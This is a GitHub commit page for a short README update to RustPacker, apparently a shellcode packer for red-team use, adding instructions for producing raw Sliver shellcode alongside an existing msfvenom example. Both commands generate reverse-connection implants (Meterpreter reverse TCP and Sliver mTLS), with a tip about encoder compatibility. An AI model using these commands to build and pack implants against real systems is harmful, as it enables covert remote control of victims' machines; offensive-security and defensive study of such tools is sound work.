Skip to content

Commit 86de5ba

Browse files
committed
Readme update
1 parent 5012632 commit 86de5ba

File tree

1 file changed

+5
-0
lines changed

1 file changed

+5
-0
lines changed

README.md

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,11 @@ RustPacker is compatible with any "raw" shellcode.
5050
You can generate raw MSF shellcode using msfvenom's raw format. Ex:
5151
- `msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw -o msf.bin`
5252

53+
### Sliver
54+
You can generate raw [Sliver](https://github.com/BishopFox/sliver) shellcode using Sliver's "--format shellcode". Ex:
55+
- `generate --mtls 127.0.0.1:443 --format shellcode --windows`
56+
- Do not use Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates do not use RWX memory regions, which are required for SGN to work.
57+
5358
## Todo
5459
- [X] Port createThread Rust template
5560
- [X] Port createRemoteThread Rust template

0 commit comments

Comments
 (0)